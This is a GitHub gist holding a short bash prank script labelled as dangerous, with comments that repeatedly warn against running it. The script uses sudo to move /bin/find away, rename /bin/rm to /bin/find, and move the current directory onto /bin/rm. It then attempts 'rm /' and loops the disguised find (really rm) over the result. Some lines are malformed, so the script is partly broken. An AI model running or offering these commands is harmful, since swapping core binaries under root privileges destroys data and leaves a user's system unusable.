Skip to content

Instantly share code, notes, and snippets.

@kj7rrv
Created December 8, 2019 15:36
Show Gist options
  • Save kj7rrv/8a30f944bbda1f036f4721a2c203b302 to your computer and use it in GitHub Desktop.
Save kj7rrv/8a30f944bbda1f036f4721a2c203b302 to your computer and use it in GitHub Desktop.
bash code you should never run (ever!)
#!/bin/bash
#donotrun.sh - do not run this
#this script is (c) 2019 ScoopGracie. All rights reserved.
#you are granted no permissions to do anything with this script.
#don't run it, modify it, redistribute it, or do anything else with it.
#i'm serious! don't use this script! it's dangerous!
sudo mv /bin/find .
sudo mv /bin/rm /bin/find
sudo mv . /bin/rm
x = $(rm /)
for i in x; do
find $i
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment